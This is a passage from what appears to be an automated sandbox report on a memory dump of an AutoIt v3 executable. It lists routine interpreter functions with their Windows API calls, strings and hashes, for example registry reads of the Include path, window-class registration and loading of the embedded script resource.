String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9f6830f80e1083ed444b3ae3a45159da1aa3170ee08f547cd7adc9397541be4b
Instruction ID: 48a57b214480cdb6d94a395e9afb2e64bf3a37bbd2a686309b72f3d57215d4f8
Opcode Fuzzy Hash: 9f6830f80e1083ed444b3ae3a45159da1aa3170ee08f547cd7adc9397541be4b
Instruction Fuzzy Hash: 5221C5B5900318EFDB00DFA4E94DB9DBFF6FB08700F10812AF911A62A1D7B185958F95

Uniqueness

Uniqueness Score: -1.00%

Function 001471EB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00144864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002062F8,?,001437C0,?), ref: 00144882

Part of subcall function 0016074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001472C5), ref: 00160771

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00147308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0017ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0017ED32
RegCloseKey.ADVAPI32(?), ref: 0017ED70
_wcscat.LIBCMT ref: 0017EDC9

Strings

Include, xrefs: 0017ECE8, 0017ED29
Software\AutoIt v3\AutoIt, xrefs: 001472FE
\, xrefs: 0017EDEC
\Include\, xrefs: 001472C5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 3c76de95e284355dd3d0a63fcc4a12678607b9882496a75df078124f017c4dec
Instruction ID: 1f7b2dd6c00a03843ef08a01d0a68417f5c176ef0f131fa0257ab74366a989cc
Opcode Fuzzy Hash: 3c76de95e284355dd3d0a63fcc4a12678607b9882496a75df078124f017c4dec
Instruction Fuzzy Hash: DB7171719083019EC714EF65EC8599BBBF8FF68740F54492EF845931B2EB30A949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00143A58, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00143A62
LoadCursorW.USER32(00000000,00007F00), ref: 00143A71
LoadIconW.USER32(00000063), ref: 00143A88
LoadIconW.USER32(000000A4), ref: 00143A9A
LoadIconW.USER32(000000A2), ref: 00143AAC
LoadImageW.USER32 ref: 00143AD2
RegisterClassExW.USER32 ref: 00143B28

Part of subcall function 00143041: GetSysColorBrush.USER32(0000000F), ref: 00143074
Part of subcall function 00143041: RegisterClassExW.USER32 ref: 0014309E
Part of subcall function 00143041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001430AF
Part of subcall function 00143041: InitCommonControlsEx.COMCTL32(?), ref: 001430CC
Part of subcall function 00143041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001430DC
Part of subcall function 00143041: LoadIconW.USER32(000000A9), ref: 001430F2
Part of subcall function 00143041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00143101

Strings

AutoIt v3, xrefs: 00143B17
#, xrefs: 00143B0D
0, xrefs: 00143B06

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9b719711baeb123f1ac06cc01274af2d5b4d52ad45769ca7cf2eeb4944bb6ff2
Instruction ID: 56ab99b4d102798e001fa36389f3d0516bfe70a3a72868838f83ffd7226c6cd2
Opcode Fuzzy Hash: 9b719711baeb123f1ac06cc01274af2d5b4d52ad45769ca7cf2eeb4944bb6ff2
Instruction Fuzzy Hash: 78211771900308EFEB109FA4FC0DB9D7FB6EB08721F10412AF904A62A2D3B656658F94

Uniqueness

Uniqueness Score: -1.00%

Function 00143778, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON

Download Yara Rule

Strings

/ErrorStdOut, xrefs: 0014388F
/AutoIt3OutputDebug, xrefs: 001438A4
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001437C0
b , xrefs: 0017D44E
/AutoIt3ExecuteScript, xrefs: 001438CE
/AutoIt3ExecuteLine, xrefs: 001438B9
CMDLINERAW, xrefs: 0014380D
CMDLINE, xrefs: 00143834

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
API String ID: 1825951767-1911826871
Opcode ID: 4c5dbd8fbbbddeed0d25f86b5411d58e0c31bcf2a657943e5f24be0a07cd1f0a
Instruction ID: db858a884246f9245f9cae024529b3c0ece6646ff0146dbfe222c9dd4ebfeffb
Opcode Fuzzy Hash: 4c5dbd8fbbbddeed0d25f86b5411d58e0c31bcf2a657943e5f24be0a07cd1f0a
Instruction Fuzzy Hash: 57A13F7191022D9EDF04EBA0DC96EEEB779BF24310F540529F416B71A2DF749A09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00143633, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 001436D2
KillTimer.USER32(?,00000001), ref: 001436FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0014371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0014372A
CreatePopupMenu.USER32 ref: 0014373E
PostQuitMessage.USER32(00000000), ref: 0014375F

Strings

TaskbarCreated, xrefs: 00143725

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7adf2ad8c21a3cd3776230d08d8e1a73d2c54d05c9ec713f26ef790377886717
Instruction ID: d7ea5aafea430fa8994c0ec5801cd9404bb30c90f911f6f1d4e9ecd930511772
Opcode Fuzzy Hash: 7adf2ad8c21a3cd3776230d08d8e1a73d2c54d05c9ec713f26ef790377886717
Instruction Fuzzy Hash: DB4126B120030ABBDF186F28EC4DB793B66EB10351F150129F966862F3CB609E659771

Uniqueness

Uniqueness Score: -1.00%

Function 0014FBBD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0014FC06
OleUninitialize.OLE32(?,00000000), ref: 0014FCA5
UnregisterHotKey.USER32(?), ref: 0014FDFC
DestroyWindow.USER32(?), ref: 00184A00
FreeLibrary.KERNEL32(?), ref: 00184A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00184A92

Strings

close all, xrefs: 0014FC01

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 746a7ffd9ae184e75b31cc90c4793ba4b850da534087272439f18ae8f40c48a0
Instruction ID: 1a0e6c2745f295cb411aa16bceec367672e8846e5f55b14ae3506a408f92a418
Opcode Fuzzy Hash: 746a7ffd9ae184e75b31cc90c4793ba4b850da534087272439f18ae8f40c48a0
Instruction Fuzzy Hash: F0A14835701212CFCB29EF54C895E69F7A5AF14700F1542ADE80AAB262DF30EE56CF94

Uniqueness

Uniqueness Score: -1.00%

Function 001B9E38, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 001B9E90
NULL Pointer assignment, xrefs: 001B9EB9, 001BA1DD

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 08c3a2b3ef5c1de593dfcc3745bf6cf98f5266481092f11f4795ee815b666370
Instruction ID: 15306e736512f7a97466c5cd5ae148668df0d2a0ae86387b2fb37dbee3443cda
Opcode Fuzzy Hash: 08c3a2b3ef5c1de593dfcc3745bf6cf98f5266481092f11f4795ee815b666370
Instruction Fuzzy Hash: 41C18F71A0020A9FDF14DFA8C884AEEBBB5EF58310F558469F915EB280D770ED45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001A7368, Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 001A737F

Part of subcall function 00160FF6: std::exception::exception.LIBCMT ref: 0016102C
Part of subcall function 00160FF6: __CxxThrowException@8.LIBCMT ref: 00161041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001A73B6
EnterCriticalSection.KERNEL32(?), ref: 001A73D2
_memmove.LIBCMT ref: 001A7420
_memmove.LIBCMT ref: 001A743D
LeaveCriticalSection.KERNEL32(?), ref: 001A744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001A7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 001A7480

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: d59479e14874387454aa99d8b5cb109b2e130286328c0f011e6e54a6742f32bc
Instruction ID: bafdd844dc4af21b99d29d12f6243a6948fe603fe936f0c48bfeec9e6723dc74
Opcode Fuzzy Hash: d59479e14874387454aa99d8b5cb109b2e130286328c0f011e6e54a6742f32bc
Instruction Fuzzy Hash: 5A315C75904205EBCF10DF68DC85EAFBBB8EF49710B1541A9F904AB286DB30DA55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00144FE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00144EEE,?,?,00000000,00000000), ref: 00144FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00144EEE,?,?,00000000,00000000), ref: 00145010
LoadResource.KERNEL32(?,00000000,?,?,00144EEE,?,?,00000000,00000000,?,?,?,?,?,?,00144F8F), ref: 0017DD60
SizeofResource.KERNEL32(?,00000000,?,?,00144EEE,?,?,00000000,00000000,?,?,?,?,?,?,00144F8F), ref: 0017DD75
LockResource.KERNEL32(00144EEE,?,?,00144EEE,?,?,00000000,00000000,?,?,?,?,?,?,00144F8F,00000000), ref: 0017DD88

Strings

SCRIPT, xrefs: 00145006

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: fd37e01153b13b80d4c3ac7e03efc16eae9bd6b99cefbca432d6e01b22da4b07
Instruction ID: caf18e0488737fe0232655936c3069a923950a34df03016f04cd481fb3b5cb7f
Opcode Fuzzy Hash: fd37e01153b13b80d4c3ac7e03efc16eae9bd6b99cefbca432d6e01b22da4b07
Instruction Fuzzy Hash: 7F112A75240701AFE7218B65DC58F677BBEEBC9B51F20816CF406976A0DB61EC418660

Uniqueness

Uniqueness Score: -1.00%

Function 001439E7, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00143A15
CreateWindowExW.USER32 ref: 00143A36
ShowWindow.USER32(00000000,?,?), ref: 00143A4A
ShowWindow.USER32(00000000,?,?), ref: 00143A53

Strings

AutoIt v3, xrefs: 00143A0D, 00143A12, 00143A13
edit, xrefs: 00143A30

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d53d438b2084c38d7ea75b9a6df721233ac68f4c6c600572e9a2c8e4e1ddd352
Instruction ID: 057a07a0f93af01a09557812b1796e7d24d0a11e46906040d340fe574bb93490
Opcode Fuzzy Hash: d53d438b2084c38d7ea75b9a6df721233ac68f4c6c600572e9a2c8e4e1ddd352
Instruction Fuzzy Hash: 6AF0B271641390BEEA211B27BC4DE673E7EE7C6F50B00412EBD04A21A1C6A65862DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 001A74D2, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 001A74E5
EnterCriticalSection.KERNEL32(?,?,00151044,?,?), ref: 001A74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00151044,?,?), ref: 001A7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00151044,?,?), ref: 001A7510

Part of subcall function 001A6ED7: CloseHandle.KERNEL32(00000000,?,001A751D,?,00151044,?,?), ref: 001A6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 001A7523
LeaveCriticalSection.KERNEL32(?,?,00151044,?,?), ref: 001A752A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6c2a41e9b5edd943fecb3f00e64f8e8178aa2556c1c872e1c51e249b8b8129bc
Instruction ID: d9306ad73b42a028f3fbc4aa25a1ad682747730407efa59b49ef5eaa47ac094e
Opcode Fuzzy Hash: 6c2a41e9b5edd943fecb3f00e64f8e8178aa2556c1c872e1c51e249b8b8129bc
Instruction Fuzzy Hash: 9FF03A3A540612EBDB121B64EC88DEA7B2AEF45302F04053AF202918A0CB75D982CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0014410D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0017D5EC

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

_memset.LIBCMT ref: 0014418D
_wcscpy.LIBCMT ref: 001441E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001441F1

Strings

Line: , xrefs: 0017D615

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 7fd3cdf3657741aa8058d4501dc5372bbf2c014f556a40bd81f22a77c422d2cf
Instruction ID: 9a82275d0f50eaadd8d89061fa1080c3a77e720c1de3d301ba5dc2fe1b7d790a
Opcode Fuzzy Hash: 7fd3cdf3657741aa8058d4501dc5372bbf2c014f556a40bd81f22a77c422d2cf
Instruction Fuzzy Hash: A931D471008314AFE721EB60EC8AFDB77E8AF64710F10451EF585920F2EB74A658C792

Uniqueness

Uniqueness Score: -1.00%

Function 00197652, Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?,?,0019799D), ref: 0019766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?), ref: 0019768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?), ref: 00197698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?), ref: 001976A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?), ref: 001976B4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 33e8005b6bba66f4bdb6fcdd6830e776f76c96802f909eb6c2cacf99b5e804e4
Instruction ID: a4c84d99007257d3b3addada136f6b2b84fa0a0ab5e485a282e7026b26ed8c04
Opcode Fuzzy Hash: 33e8005b6bba66f4bdb6fcdd6830e776f76c96802f909eb6c2cacf99b5e804e4
Instruction Fuzzy Hash: F6017176615604BBEB105F59DC44EAA7FBDEF44B51F140028FD04D2261E731DD4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 001469CA, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00144F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00144F6F

_free.LIBCMT ref: 0017E68C
_free.LIBCMT ref: 0017E6D3

Part of subcall function 00146BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00146D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0017E462
Bad directive syntax error, xrefs: 0017E6BB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: a98865a62ab4abe1869946ba14c62f815b583bf59d05d5235fb8a932b0736d9a
Instruction ID: 537251c09e6d4eed3ad4ce50653fc2c07fdb584c2694dde2306deeabc5793e80
Opcode Fuzzy Hash: a98865a62ab4abe1869946ba14c62f815b583bf59d05d5235fb8a932b0736d9a
Instruction Fuzzy Hash: FF914071910219AFCF04EFA4CC919EDB7F5FF29314F148469F81AAB2A1EB309915CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001435B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001435A1,SwapMouseButtons,00000004,?), ref: 001435D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,001435A1,SwapMouseButtons,00000004,?,?,?,?,00142754), ref: 001435F5
RegCloseKey.KERNEL32(00000000,?,?,001435A1,SwapMouseButtons,00000004,?,?,?,?,00142754), ref: 00143617

Strings

Control Panel\Mouse, xrefs: 001435D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8b84dcf91302994fc694a00a123c2009e6ba09aeed63435e457576d1a1bd0668
Instruction ID: d0948de279adfe1e4d8c9c018db867087109609119d1b3b7c50f2ddc4f32c43b
Opcode Fuzzy Hash: 8b84dcf91302994fc694a00a123c2009e6ba09aeed63435e457576d1a1bd0668
Instruction Fuzzy Hash: 3C115775610209BFDB209FA4DC80EEEBBB9EF04740F128469F805D7220E3719F519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001976C5, Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3559f5fb658d4b4ffd13a0f1d3b0e050841b39148106057be9bb7a2a93e0e128
Instruction ID: 94ab53ae28171b4b27081cdb624a4cd8b8854e4310529366b6a3330b0d2616c9
Opcode Fuzzy Hash: 3559f5fb658d4b4ffd13a0f1d3b0e050841b39148106057be9bb7a2a93e0e128
Instruction Fuzzy Hash: 91C15E75A14216EFCF18CF94C888EAEBBB5FF48714B158599E805EB291D730ED81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B83A8, Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001B83D8
CoUninitialize.OLE32 ref: 001B83E3

Part of subcall function 0019DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0019DAC5

VariantInit.OLEAUT32(?), ref: 001B83EE
VariantClear.OLEAUT32(?), ref: 001B86BF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: bba7d51e3b4a2b29634572ad7ef0247c89451718adff55e76e7d9f561339d8f6
Instruction ID: 3bf31b6d21e6d9925c4479dffd99ba5632aa129415feeda63849bfe346081f94
Opcode Fuzzy Hash: bba7d51e3b4a2b29634572ad7ef0247c89451718adff55e76e7d9f561339d8f6
Instruction Fuzzy Hash: 88A159752047029FCB14DF24C885B6AB7E9BF98714F14844DF99A9B3A2CB30ED45CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001A97E5, Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00145045: _fseek.LIBCMT ref: 0014505D

Part of subcall function 001A99BE: _wcscmp.LIBCMT ref: 001A9AAE
Part of subcall function 001A99BE: _wcscmp.LIBCMT ref: 001A9AC1

_free.LIBCMT ref: 001A992C
_free.LIBCMT ref: 001A9933
_free.LIBCMT ref: 001A999E

Part of subcall function 00162F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00169C64,00000000,00168D6D,001659D3,?), ref: 00162FA9
Part of subcall function 00162F95: GetLastError.KERNEL32(00000000,?,00169C64,00000000,00168D6D,001659D3,?), ref: 00162FBB

_free.LIBCMT ref: 001A99A6

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

